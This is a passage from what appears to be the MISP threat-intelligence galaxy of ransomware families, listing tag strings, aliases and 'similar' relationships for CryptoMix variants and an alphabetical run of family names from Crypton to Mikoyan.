similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-x1881

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-x1881"

CryptoMix-x1881 is also known as:

x1881 CryptoMix

View relationships graph

CryptoMix-x1881 has relationships with:

similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-XZZX

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-XZZX"

CryptoMix-XZZX is also known as:

XZZX CryptoMix

View relationships graph

CryptoMix-XZZX has relationships with:

similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Zayka

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Zayka"

CryptoMix-Zayka is also known as:

Zayka CryptoMix

View relationships graph

CryptoMix-Zayka has relationships with:

similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

Crypton

Ransomware

The tag is: misp-galaxy:ransomware="Crypton"

CryptoPatronum

Ransomware

The tag is: misp-galaxy:ransomware="CryptoPatronum"

CryptoPokemon

Ransomware

The tag is: misp-galaxy:ransomware="CryptoPokemon"

CryptorBit

Ransomware

The tag is: misp-galaxy:ransomware="CryptorBit"

CryptoShield 2.0

Ransomware

The tag is: misp-galaxy:ransomware="CryptoShield 2.0"

CryptoSpider

Ransomware

The tag is: misp-galaxy:ransomware="CryptoSpider"

CryptoViki

Ransomware

The tag is: misp-galaxy:ransomware="CryptoViki"

Cryptre

Ransomware

The tag is: misp-galaxy:ransomware="Cryptre"

CrypTron

Ransomware

The tag is: misp-galaxy:ransomware="CrypTron"

Crysis XTBL

Ransomware

The tag is: misp-galaxy:ransomware="Crysis XTBL"

Crystal

Ransomware

The tag is: misp-galaxy:ransomware="Crystal"

CrystalCrypt

Ransomware

The tag is: misp-galaxy:ransomware="CrystalCrypt"

CryTekk

Ransomware

The tag is: misp-galaxy:ransomware="CryTekk"

CSP

Ransomware

The tag is: misp-galaxy:ransomware="CSP"

CTB-Locker Original

Ransomware

The tag is: misp-galaxy:ransomware="CTB-Locker Original"

CTF

Ransomware

The tag is: misp-galaxy:ransomware="CTF"

Cuba

Ransomware

The tag is: misp-galaxy:ransomware="Cuba"

Curumim

Ransomware

The tag is: misp-galaxy:ransomware="Curumim"

CVLocker

Ransomware

The tag is: misp-galaxy:ransomware="CVLocker"

Cyber Police HT

Ransomware

The tag is: misp-galaxy:ransomware="Cyber Police HT"

CyberDrill2

Ransomware

The tag is: misp-galaxy:ransomware="CyberDrill2"

CyberResearcher

Ransomware

The tag is: misp-galaxy:ransomware="CyberResearcher"

CyberSCCP

Ransomware

The tag is: misp-galaxy:ransomware="CyberSCCP"

CyberSoldier

Ransomware

The tag is: misp-galaxy:ransomware="CyberSoldier"

Cyclone

Ransomware

The tag is: misp-galaxy:ransomware="Cyclone"

CypherPy

Ransomware

The tag is: misp-galaxy:ransomware="CypherPy"

Cyspt

Ransomware

The tag is: misp-galaxy:ransomware="Cyspt"

Czech

Ransomware

The tag is: misp-galaxy:ransomware="Czech"

D00mEd

Ransomware

The tag is: misp-galaxy:ransomware="D00mEd"

D2+D

Ransomware

The tag is: misp-galaxy:ransomware="D2+D"

DarkKomet

Ransomware

The tag is: misp-galaxy:ransomware="DarkKomet"

DarkLocker

Ransomware

The tag is: misp-galaxy:ransomware="DarkLocker"

DarkoderCryptor

Ransomware

The tag is: misp-galaxy:ransomware="DarkoderCryptor"

DataKeeper

Ransomware

The tag is: misp-galaxy:ransomware="DataKeeper"

Datebatut

Ransomware

The tag is: misp-galaxy:ransomware="Datebatut"

DCRTR

Ransomware

The tag is: misp-galaxy:ransomware="DCRTR"

DCRTR-WDM

Ransomware

The tag is: misp-galaxy:ransomware="DCRTR-WDM"

DCry

Ransomware

The tag is: misp-galaxy:ransomware="DCry"

DDE

Ransomware

The tag is: misp-galaxy:ransomware="DDE"

DeadSec-Crypto

Ransomware

The tag is: misp-galaxy:ransomware="DeadSec-Crypto"

DeathHiddenTear (Large&Small HT) >

Ransomware

The tag is: misp-galaxy:ransomware="DeathHiddenTear (Large&Small HT) > "

DeathNote

Ransomware

The tag is: misp-galaxy:ransomware="DeathNote"

DeathRansom

Ransomware

The tag is: misp-galaxy:ransomware="DeathRansom"

DecryptIomega

Ransomware

The tag is: misp-galaxy:ransomware="DecryptIomega"

Decryption Assistant

Ransomware

The tag is: misp-galaxy:ransomware="Decryption Assistant"

DecService

Ransomware

The tag is: misp-galaxy:ransomware="DecService"

DecYourData

Ransomware

The tag is: misp-galaxy:ransomware="DecYourData"

Defender

Ransomware

The tag is: misp-galaxy:ransomware="Defender"

Defray (Glushkov)

Ransomware

The tag is: misp-galaxy:ransomware="Defray (Glushkov)"

Deos

Ransomware

The tag is: misp-galaxy:ransomware="Deos"

Desktop

Ransomware

The tag is: misp-galaxy:ransomware="Desktop"

Diamond

Ransomware

The tag is: misp-galaxy:ransomware="Diamond"

DilmaLocker

Ransomware

The tag is: misp-galaxy:ransomware="DilmaLocker"

Dishwasher

Ransomware

The tag is: misp-galaxy:ransomware="Dishwasher"

District

Ransomware

The tag is: misp-galaxy:ransomware="District"

DMA Locker 1.0-2.0-3.0

Ransomware

The tag is: misp-galaxy:ransomware="DMA Locker 1.0-2.0-3.0"

DMA Locker 4.0

Ransomware

The tag is: misp-galaxy:ransomware="DMA Locker 4.0"

DMALocker Imposter

Ransomware

The tag is: misp-galaxy:ransomware="DMALocker Imposter"

Dodger

Ransomware

The tag is: misp-galaxy:ransomware="Dodger"

DolphinTear

Ransomware

The tag is: misp-galaxy:ransomware="DolphinTear"

Donald Trump

Ransomware

The tag is: misp-galaxy:ransomware="Donald Trump"

Donation1

Ransomware

The tag is: misp-galaxy:ransomware="Donation1"

Done

Ransomware

The tag is: misp-galaxy:ransomware="Done"

Dont_Worry

Ransomware

The tag is: misp-galaxy:ransomware="Dont_Worry"

DotNoData

Ransomware

The tag is: misp-galaxy:ransomware="DotNoData"

DotZeroCMD

Ransomware

The tag is: misp-galaxy:ransomware="DotZeroCMD"

Dr. Fucker

Ransomware

The tag is: misp-galaxy:ransomware="Dr. Fucker"

Dr. Jimbo

Ransomware

The tag is: misp-galaxy:ransomware="Dr. Jimbo"

Drakos

Ransomware

The tag is: misp-galaxy:ransomware="Drakos"

DriedSister

Ransomware

The tag is: misp-galaxy:ransomware="DriedSister"

Dviide

Ransomware

The tag is: misp-galaxy:ransomware="Dviide"

eBayWall

Ransomware

The tag is: misp-galaxy:ransomware="eBayWall"

EbolaRnsmwr

Ransomware

The tag is: misp-galaxy:ransomware="EbolaRnsmwr"

ECLR

Ransomware

The tag is: misp-galaxy:ransomware="ECLR"

EggLocker

Ransomware

The tag is: misp-galaxy:ransomware="EggLocker"

Ekati demo tool

Ransomware

The tag is: misp-galaxy:ransomware="Ekati demo tool"

Enc1

Ransomware

The tag is: misp-galaxy:ransomware="Enc1"

EncoderCSL

Ransomware

The tag is: misp-galaxy:ransomware="EncoderCSL"

EnCrypt

Ransomware

The tag is: misp-galaxy:ransomware="EnCrypt"

EncryptedBatch

Ransomware

The tag is: misp-galaxy:ransomware="EncryptedBatch"

EncryptServer2018

Ransomware

The tag is: misp-galaxy:ransomware="EncryptServer2018"

EnybenyCrypt

Ransomware

The tag is: misp-galaxy:ransomware="EnybenyCrypt"

EOEO

Ransomware

The tag is: misp-galaxy:ransomware="EOEO"

Epoblockl

Ransomware

The tag is: misp-galaxy:ransomware="Epoblockl"

Erica2020

Ransomware

The tag is: misp-galaxy:ransomware="Erica2020"

Eris

Ransomware

The tag is: misp-galaxy:ransomware="Eris"

Estemani

Ransomware

The tag is: misp-galaxy:ransomware="Estemani"

Eternal

Ransomware

The tag is: misp-galaxy:ransomware="Eternal"

Eternity

Ransomware

The tag is: misp-galaxy:ransomware="Eternity"

Euclid

Ransomware

The tag is: misp-galaxy:ransomware="Euclid"

Evasive HT

Ransomware

The tag is: misp-galaxy:ransomware="Evasive HT"

Evolution

Ransomware

The tag is: misp-galaxy:ransomware="Evolution"

Executioner

Ransomware

The tag is: misp-galaxy:ransomware="Executioner"

ExecutionerPlus

Ransomware

The tag is: misp-galaxy:ransomware="ExecutionerPlus"

Exocrypt XTC

Ransomware

The tag is: misp-galaxy:ransomware="Exocrypt XTC"

ExoLock

Ransomware

The tag is: misp-galaxy:ransomware="ExoLock"

ExpBoot

Ransomware

The tag is: misp-galaxy:ransomware="ExpBoot"

Explorer

Ransomware

The tag is: misp-galaxy:ransomware="Explorer"

Extortion Scam

Ransomware

The tag is: misp-galaxy:ransomware="Extortion Scam"

Extortion Scam is also known as:

Sextortion Scam

Extractor

Ransomware

The tag is: misp-galaxy:ransomware="Extractor"

EyLamo

Ransomware

The tag is: misp-galaxy:ransomware="EyLamo"

EZDZ

Ransomware

The tag is: misp-galaxy:ransomware="EZDZ"

Fabiansomware

Ransomware

The tag is: misp-galaxy:ransomware="Fabiansomware"

Facebook HT

Ransomware

The tag is: misp-galaxy:ransomware="Facebook HT"

Faizal

Ransomware

The tag is: misp-galaxy:ransomware="Faizal"

Fake Cerber

Ransomware

The tag is: misp-galaxy:ransomware="Fake Cerber"

Fake DMA

ransomware

The tag is: misp-galaxy:ransomware="Fake DMA"

FartPlz

ransomware

The tag is: misp-galaxy:ransomware="FartPlz"

FBLocker

ransomware

The tag is: misp-galaxy:ransomware="FBLocker"

FCP

ransomware

The tag is: misp-galaxy:ransomware="FCP"

FCrypt

ransomware

The tag is: misp-galaxy:ransomware="FCrypt"

FCT

ransomware

The tag is: misp-galaxy:ransomware="FCT"

Fenrir

ransomware

The tag is: misp-galaxy:ransomware="Fenrir"

File Ripper

ransomware

The tag is: misp-galaxy:ransomware="File Ripper"

FileFuck

ransomware

The tag is: misp-galaxy:ransomware="FileFuck"

FilesL0cker

ransomware

The tag is: misp-galaxy:ransomware="FilesL0cker"

Final

ransomware

The tag is: misp-galaxy:ransomware="Final"

FindZip

ransomware

The tag is: misp-galaxy:ransomware="FindZip"

Flatcher3

ransomware

The tag is: misp-galaxy:ransomware="Flatcher3"

Fluffy-TAR

ransomware

The tag is: misp-galaxy:ransomware="Fluffy-TAR"

Foxy

ransomware

The tag is: misp-galaxy:ransomware="Foxy"

FreeMe

ransomware

The tag is: misp-galaxy:ransomware="FreeMe"

Freshdesk

ransomware

The tag is: misp-galaxy:ransomware="Freshdesk"

Frog

ransomware

The tag is: misp-galaxy:ransomware="Frog"

FrozrLock

ransomware

The tag is: misp-galaxy:ransomware="FrozrLock"

FRS

ransomware

The tag is: misp-galaxy:ransomware="FRS"

FScrypt

ransomware

The tag is: misp-galaxy:ransomware="FScrypt"

FuckTheSystem

ransomware

The tag is: misp-galaxy:ransomware="FuckTheSystem"

FuxSocy Encryptor

ransomware

The tag is: misp-galaxy:ransomware="FuxSocy Encryptor"

Galacti-Crypter

ransomware

The tag is: misp-galaxy:ransomware="Galacti-Crypter"

GameOver

ransomware

The tag is: misp-galaxy:ransomware="GameOver"

Geminis3

ransomware

The tag is: misp-galaxy:ransomware="Geminis3"

Gendarmerie

ransomware

The tag is: misp-galaxy:ransomware="Gendarmerie"

Genobot

ransomware

The tag is: misp-galaxy:ransomware="Genobot"

GermanWiper

ransomware

The tag is: misp-galaxy:ransomware="GermanWiper"

GhosTEncryptor

ransomware

The tag is: misp-galaxy:ransomware="GhosTEncryptor"

GhostHammer

ransomware

The tag is: misp-galaxy:ransomware="GhostHammer"

Gibberish

ransomware

The tag is: misp-galaxy:ransomware="Gibberish"

Gibon

ransomware

The tag is: misp-galaxy:ransomware="Gibon"

Giyotin

ransomware

The tag is: misp-galaxy:ransomware="Giyotin"

GoCryptoLocker

ransomware

The tag is: misp-galaxy:ransomware="GoCryptoLocker"

Godra

ransomware

The tag is: misp-galaxy:ransomware="Godra"

GoGoogle

ransomware

The tag is: misp-galaxy:ransomware="GoGoogle"

GoHack

ransomware

The tag is: misp-galaxy:ransomware="GoHack"

Golden Axe

ransomware

The tag is: misp-galaxy:ransomware="Golden Axe"

Gomme

ransomware

The tag is: misp-galaxy:ransomware="Gomme"

GonnaCry Ransmware

ransomware

The tag is: misp-galaxy:ransomware="GonnaCry Ransmware"

Goofed HT

ransomware

The tag is: misp-galaxy:ransomware="Goofed HT"

GoRansom POC

ransomware

The tag is: misp-galaxy:ransomware="GoRansom POC"

Gorgon

ransomware

The tag is: misp-galaxy:ransomware="Gorgon"

Gotcha

ransomware

The tag is: misp-galaxy:ransomware="Gotcha"

GottaCry

ransomware

The tag is: misp-galaxy:ransomware="GottaCry"

GPAA

ransomware

The tag is: misp-galaxy:ransomware="GPAA"

GPGQwerty

ransomware

The tag is: misp-galaxy:ransomware="GPGQwerty"

Craftul

ransomware

The tag is: misp-galaxy:ransomware="Craftul"

Greystars

ransomware

The tag is: misp-galaxy:ransomware="Greystars"

GrodexCrypt

ransomware

The tag is: misp-galaxy:ransomware="GrodexCrypt"

GrujaRSorium

ransomware

The tag is: misp-galaxy:ransomware="GrujaRSorium"

Gruxer

ransomware

The tag is: misp-galaxy:ransomware="Gruxer"

GusCrypter

ransomware

The tag is: misp-galaxy:ransomware="GusCrypter"

GX40

ransomware

The tag is: misp-galaxy:ransomware="GX40"

H34rtBl33d

ransomware

The tag is: misp-galaxy:ransomware="H34rtBl33d"

HackdoorCrypt3r

ransomware

The tag is: misp-galaxy:ransomware="HackdoorCrypt3r"

Hades

ransomware

The tag is: misp-galaxy:ransomware="Hades"

View relationships graph

Hades has relationships with:

similar: misp-galaxy:ransomware="WildFire Locker" with estimative-language:likelihood-probability="likely"

Hakbit

ransomware

The tag is: misp-galaxy:ransomware="Hakbit"

HappyCrypter

ransomware

The tag is: misp-galaxy:ransomware="HappyCrypter"

Haze

ransomware

The tag is: misp-galaxy:ransomware="Haze"

HCrypto

ransomware

The tag is: misp-galaxy:ransomware="HCrypto"

HELP@AUSI

ransomware

The tag is: misp-galaxy:ransomware="HELP@AUSI"

HelpDCFile

ransomware

The tag is: misp-galaxy:ransomware="HelpDCFile"

HelpMe

ransomware

The tag is: misp-galaxy:ransomware="HelpMe"

Hermes837

ransomware

The tag is: misp-galaxy:ransomware="Hermes837"

HermesVirus HT

ransomware

The tag is: misp-galaxy:ransomware="HermesVirus HT"

Heropoint

ransomware

The tag is: misp-galaxy:ransomware="Heropoint"

HiddenBeer

ransomware

The tag is: misp-galaxy:ransomware="HiddenBeer"

Honor

ransomware

The tag is: misp-galaxy:ransomware="Honor"

Horros

ransomware

The tag is: misp-galaxy:ransomware="Horros"

Hydra

ransomware

The tag is: misp-galaxy:ransomware="Hydra"

IGotYou

ransomware

The tag is: misp-galaxy:ransomware="IGotYou"

iGZa4C

ransomware

The tag is: misp-galaxy:ransomware="iGZa4C"

ILElection2020

ransomware

The tag is: misp-galaxy:ransomware="ILElection2020"

Ims00ry

ransomware

The tag is: misp-galaxy:ransomware="Ims00ry"

ImSorry

ransomware

The tag is: misp-galaxy:ransomware="ImSorry"

Incanto

ransomware

The tag is: misp-galaxy:ransomware="Incanto"

Indrik

ransomware

The tag is: misp-galaxy:ransomware="Indrik"

InducVirus

ransomware

The tag is: misp-galaxy:ransomware="InducVirus"

InfinityLock

ransomware

The tag is: misp-galaxy:ransomware="InfinityLock"

InfoDot

ransomware

The tag is: misp-galaxy:ransomware="InfoDot"

INPIVX

ransomware

The tag is: misp-galaxy:ransomware="INPIVX"

InsaneCrypt

ransomware

The tag is: misp-galaxy:ransomware="InsaneCrypt"

IPA

ransomware

The tag is: misp-galaxy:ransomware="IPA"

IT.Books

ransomware

The tag is: misp-galaxy:ransomware="IT.Books"

J-

ransomware

The tag is: misp-galaxy:ransomware="J-"

JabaCrypter

ransomware

The tag is: misp-galaxy:ransomware="JabaCrypter"

Jaffe

ransomware

The tag is: misp-galaxy:ransomware="Jaffe"

James

ransomware

The tag is: misp-galaxy:ransomware="James"

Java NotDharma

ransomware

The tag is: misp-galaxy:ransomware="Java NotDharma"

jCandy

ransomware

The tag is: misp-galaxy:ransomware="jCandy"

JeepersCrypt

ransomware

The tag is: misp-galaxy:ransomware="JeepersCrypt"

Jemd

ransomware

The tag is: misp-galaxy:ransomware="Jemd"

JesusCrypt

ransomware

The tag is: misp-galaxy:ransomware="JesusCrypt"

JNEC.a

ransomware

The tag is: misp-galaxy:ransomware="JNEC.a"

JoeGo

ransomware

The tag is: misp-galaxy:ransomware="JoeGo"

Jolly Roger

ransomware

The tag is: misp-galaxy:ransomware="Jolly Roger"

JosepCrypt

ransomware

The tag is: misp-galaxy:ransomware="JosepCrypt"

Juwon

ransomware

The tag is: misp-galaxy:ransomware="Juwon"

Kali

ransomware

The tag is: misp-galaxy:ransomware="Kali"

Kamil

ransomware

The tag is: misp-galaxy:ransomware="Kamil"

Kampret

ransomware

The tag is: misp-galaxy:ransomware="Kampret"

Karo

ransomware

The tag is: misp-galaxy:ransomware="Karo"

Katafrank

ransomware

The tag is: misp-galaxy:ransomware="Katafrank"

Katyusha

ransomware

The tag is: misp-galaxy:ransomware="Katyusha"

KCTF Locker

ransomware

The tag is: misp-galaxy:ransomware="KCTF Locker"

KCW

ransomware

The tag is: misp-galaxy:ransomware="KCW"

Kee

ransomware

The tag is: misp-galaxy:ransomware="Kee"

KEKW

ransomware

The tag is: misp-galaxy:ransomware="KEKW"

Kerkoporta

ransomware

The tag is: misp-galaxy:ransomware="Kerkoporta"

KeyMaker

ransomware

The tag is: misp-galaxy:ransomware="KeyMaker"

KillBot_Virus

ransomware

The tag is: misp-galaxy:ransomware="KillBot_Virus"

KillDisk-Dimens

ransomware

The tag is: misp-galaxy:ransomware="KillDisk-Dimens"

KillRabbit

ransomware

The tag is: misp-galaxy:ransomware="KillRabbit"

KillSwitch

ransomware

The tag is: misp-galaxy:ransomware="KillSwitch"

Kindest

ransomware

The tag is: misp-galaxy:ransomware="Kindest"

KKK

ransomware

The tag is: misp-galaxy:ransomware="KKK"

Kovter

ransomware

The tag is: misp-galaxy:ransomware="Kovter"

Kriptovor

ransomware

The tag is: misp-galaxy:ransomware="Kriptovor"

Krypte

ransomware

The tag is: misp-galaxy:ransomware="Krypte"

Krypton

ransomware

The tag is: misp-galaxy:ransomware="Krypton"

Kryptonite RBY

ransomware

The tag is: misp-galaxy:ransomware="Kryptonite RBY"

Kryptonite Snake

ransomware

The tag is: misp-galaxy:ransomware="Kryptonite Snake"

Kupidon

ransomware

The tag is: misp-galaxy:ransomware="Kupidon"

Ladon

ransomware

The tag is: misp-galaxy:ransomware="Ladon"

Lalabitch_ransomware

ransomware

The tag is: misp-galaxy:ransomware="Lalabitch_ransomware"

LazagneCrypt

ransomware

The tag is: misp-galaxy:ransomware="LazagneCrypt"

Light

ransomware

The tag is: misp-galaxy:ransomware="Light"

LightningCrypt

ransomware

The tag is: misp-galaxy:ransomware="LightningCrypt"

LIGMA

ransomware

The tag is: misp-galaxy:ransomware="LIGMA"

Lime

ransomware

The tag is: misp-galaxy:ransomware="Lime"

Litra

ransomware

The tag is: misp-galaxy:ransomware="Litra"

LittleFinger

ransomware

The tag is: misp-galaxy:ransomware="LittleFinger"

LMAOxUS

ransomware

The tag is: misp-galaxy:ransomware="LMAOxUS"

LockBox

ransomware

The tag is: misp-galaxy:ransomware="LockBox"

Locked_File

ransomware

The tag is: misp-galaxy:ransomware="Locked_File"

LockedByte

ransomware

The tag is: misp-galaxy:ransomware="LockedByte"

Locker-Pay

ransomware

The tag is: misp-galaxy:ransomware="Locker-Pay"

Lockify

ransomware

The tag is: misp-galaxy:ransomware="Lockify"

LockMe

ransomware

The tag is: misp-galaxy:ransomware="LockMe"

LockOn

ransomware

The tag is: misp-galaxy:ransomware="LockOn"

Lockout

ransomware

The tag is: misp-galaxy:ransomware="Lockout"

LongTermMemoryLoss

ransomware

The tag is: misp-galaxy:ransomware="LongTermMemoryLoss"

LonleyCrypt

ransomware

The tag is: misp-galaxy:ransomware="LonleyCrypt"

LooCipher

ransomware

The tag is: misp-galaxy:ransomware="LooCipher"

LordOfShadow

ransomware

The tag is: misp-galaxy:ransomware="LordOfShadow"

Losers

ransomware

The tag is: misp-galaxy:ransomware="Losers"

Losers-Dangerous

ransomware

The tag is: misp-galaxy:ransomware="Losers-Dangerous"

Lost_Files

ransomware

The tag is: misp-galaxy:ransomware="Lost_Files"

LuckyJoe

ransomware

The tag is: misp-galaxy:ransomware="LuckyJoe"

Luxnut

ransomware

The tag is: misp-galaxy:ransomware="Luxnut"

Madafakah

ransomware

The tag is: misp-galaxy:ransomware="Madafakah"

MadBit

ransomware

The tag is: misp-galaxy:ransomware="MadBit"

Magician

ransomware

The tag is: misp-galaxy:ransomware="Magician"

Malabu

ransomware

The tag is: misp-galaxy:ransomware="Malabu"

MalwareTech’s CTF

ransomware

The tag is: misp-galaxy:ransomware="MalwareTech’s CTF"

Mancros+AI4939

ransomware

The tag is: misp-galaxy:ransomware="Mancros+AI4939"

Maoloa

ransomware

The tag is: misp-galaxy:ransomware="Maoloa"

Marozka

ransomware

The tag is: misp-galaxy:ransomware="Marozka"

MarraCrypt

ransomware

The tag is: misp-galaxy:ransomware="MarraCrypt"

Matroska

ransomware

The tag is: misp-galaxy:ransomware="Matroska"

MauriGo

ransomware

The tag is: misp-galaxy:ransomware="MauriGo"

MaxiCrypt

ransomware

The tag is: misp-galaxy:ransomware="MaxiCrypt"

Maykolin

ransomware

The tag is: misp-galaxy:ransomware="Maykolin"

Maysomware

ransomware

The tag is: misp-galaxy:ransomware="Maysomware"

MBR-ONI

ransomware

The tag is: misp-galaxy:ransomware="MBR-ONI"

MedusaLocker

ransomware

The tag is: misp-galaxy:ransomware="MedusaLocker"

Meduza

ransomware

The tag is: misp-galaxy:ransomware="Meduza"

MegaLocker

ransomware

The tag is: misp-galaxy:ransomware="MegaLocker"

Mew767

ransomware

The tag is: misp-galaxy:ransomware="Mew767"

Mike NotSTOP

ransomware

The tag is: misp-galaxy:ransomware="Mike NotSTOP"

Mikoyan

ransomware

